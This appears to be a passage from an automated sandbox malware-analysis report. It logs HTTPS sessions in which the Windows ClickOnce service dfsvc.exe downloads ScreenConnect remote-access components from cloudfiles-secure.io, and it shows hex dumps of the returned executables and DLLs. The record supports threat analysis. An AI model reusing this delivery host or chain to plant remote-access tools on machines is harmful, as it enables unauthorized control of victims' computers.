                                                                                                                                                                                                                                                                        2024-10-02 04:23:03 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        6192.168.2.549727178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:23:03 UTC119OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:23:04 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:23:04 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:23:04 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        7192.168.2.549729178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:23:04 UTC109OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:23:05 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 81696
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:23:04 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:23:05 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
                                                                                                                                                                                                                                                                        2024-10-02 04:23:05 UTC16384INData Raw: 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34
                                                                                                                                                                                                                                                                        Data Ascii: -452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
                                                                                                                                                                                                                                                                        2024-10-02 04:23:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff
                                                                                                                                                                                                                                                                        Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                                                                                                                                        2024-10-02 04:23:05 UTC16384INData Raw: 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: fffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                                                                                                                                        2024-10-02 04:23:05 UTC16376INData Raw: 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: n


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        8192.168.2.549731178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:23:05 UTC97OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 197120
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:23:06 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC16384INData Raw: 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a
                                                                                                                                                                                                                                                                        Data Ascii: &rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***0@su
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC16384INData Raw: 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc
                                                                                                                                                                                                                                                                        Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC16384INData Raw: 01 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f
                                                                                                                                                                                                                                                                        Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC16384INData Raw: b2 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00
                                                                                                                                                                                                                                                                        Data Ascii: *+{>+Bd+/q+PX!*++j,f f,f f: ,t',x)*f2vV
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC16384INData Raw: 1c 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15
                                                                                                                                                                                                                                                                        Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkk
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC16384INData Raw: 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74
                                                                                                                                                                                                                                                                        Data Ascii: RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadat
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC16384INData Raw: 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76
                                                                                                                                                                                                                                                                        Data Ascii: kMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceiv
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC16384INData Raw: 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00
                                                                                                                                                                                                                                                                        Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVol
                                                                                                                                                                                                                                                                        2024-10-02 04:23:06 UTC16384INData Raw: 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06
                                                                                                                                                                                                                                                                        Data Ascii: rtMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        9192.168.2.549734178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:23:07 UTC104OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:23:07 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 68096
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:23:07 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:23:07 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
